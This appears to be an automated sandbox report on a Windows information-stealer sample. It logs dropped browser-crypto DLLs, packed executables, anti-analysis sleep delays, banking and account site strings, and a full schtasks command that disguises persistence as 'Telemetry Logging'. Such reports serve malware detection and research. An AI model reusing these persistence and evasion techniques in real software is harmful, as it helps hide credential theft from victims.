                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: wsock32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: mozglue.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: msvcp140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: vcruntime140.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\KFCFBFHIEB.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\ProgramData\KFCFBFHIEB.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\ProgramData\KFCFBFHIEB.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\ProgramData\KFCFBFHIEB.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mozglue.pdbP source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
                    Source: Binary string: freebl3.pdb source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                    Source: Binary string: freebl3.pdbp source: freebl3.dll.11.dr, freebl3[1].dll.11.dr
                    Source: Binary string: nss3.pdb@ source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                    Source: Binary string: softokn3.pdb@ source: softokn3.dll.11.dr, softokn3[1].dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.11.dr, vcruntime140[1].dll.11.dr
                    Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.11.dr, msvcp140.dll.11.dr
                    Source: Binary string: nss3.pdb source: Pct.pif, 0000000B.00000002.3831048696.000000006CE5F000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.11.dr, nss3.dll.11.dr
                    Source: Binary string: mozglue.pdb source: Pct.pif, 0000000B.00000002.3830830020.000000006CC9D000.00000002.00000001.01000000.00000009.sdmp, mozglue[1].dll.11.dr, mozglue.dll.11.dr
                    Source: Binary string: softokn3.pdb source: softokn3.dll.11.dr, softokn3[1].dll.11.dr

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\ProgramData\KFCFBFHIEB.exeUnpacked PE file: 22.2.KFCFBFHIEB.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeUnpacked PE file: 25.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                    Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                    Source: softokn3[1].dll.11.drStatic PE information: section name: .00cfg
                    Source: KFCFBFHIEB.exe.11.drStatic PE information: section name: .MPRESS1
                    Source: KFCFBFHIEB.exe.11.drStatic PE information: section name: .MPRESS2
                    Source: l3[1].exe.11.drStatic PE information: section name: .MPRESS1
                    Source: l3[1].exe.11.drStatic PE information: section name: .MPRESS2
                    Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                    Source: freebl3[1].dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                    Source: mozglue[1].dll.11.drStatic PE information: section name: .00cfg
                    Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                    Source: msvcp140[1].dll.11.drStatic PE information: section name: .didat
                    Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                    Source: nss3[1].dll.11.drStatic PE information: section name: .00cfg
                    Source: oobeldr.exe.22.drStatic PE information: section name: .MPRESS1
                    Source: oobeldr.exe.22.drStatic PE information: section name: .MPRESS2
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE8B75 push ecx; ret 11_2_00BE8B88
                    Source: C:\ProgramData\KFCFBFHIEB.exeCode function: 22_2_006D50A5 push ebp; ret 22_2_00721C57

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\627982\Pct.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\627982\Pct.pifJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\l3[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\ProgramData\KFCFBFHIEB.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\KFCFBFHIEB.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\KFCFBFHIEB.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\ProgramData\KFCFBFHIEB.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C459B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00C459B3
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BD5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00BD5EDA
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BE33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00BE33B7
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\ProgramData\KFCFBFHIEB.exeAPI/Special instruction interceptor: Address: 5DAFBF
                    Source: C:\ProgramData\KFCFBFHIEB.exeAPI/Special instruction interceptor: Address: 761C29
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeAPI/Special instruction interceptor: Address: 5DAFBF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeAPI/Special instruction interceptor: Address: 761C29
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeWindow / User API: threadDelayed 3748Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeWindow / User API: threadDelayed 6247Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifAPI coverage: 3.4 %
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304Thread sleep count: 3748 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304Thread sleep time: -843300s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304Thread sleep count: 6247 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 4304Thread sleep time: -1405575s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exeLast function: Thread delayed
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C24005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00C24005
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00C2C2FF
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00C2494A
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00C2CD9F
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2CD14 FindFirstFileW,FindClose,11_2_00C2CD14
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00C2F5D8
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00C2F735
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C2FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00C2FA36
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00C23CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00C23CE2
                    Source: C:\Users\user\AppData\Local\Temp\627982\Pct.pifCode function: 11_2_00BD5D13 GetVersionExW,GetCurrentProcess,IsWow64Process,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00BD5D13
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\627982Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\627982\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: FCGIJKJJ.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                    Source: FCGIJKJJ.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                    Source: FCGIJKJJ.11.drBinary or memory string: discord.comVMware20,11696487552f
                    Source: FCGIJKJJ.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                    Source: FCGIJKJJ.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B3F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: Pct.pif, 0000000B.00000002.3806737898.0000000001B5B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: FCGIJKJJ.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                    Source: FCGIJKJJ.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
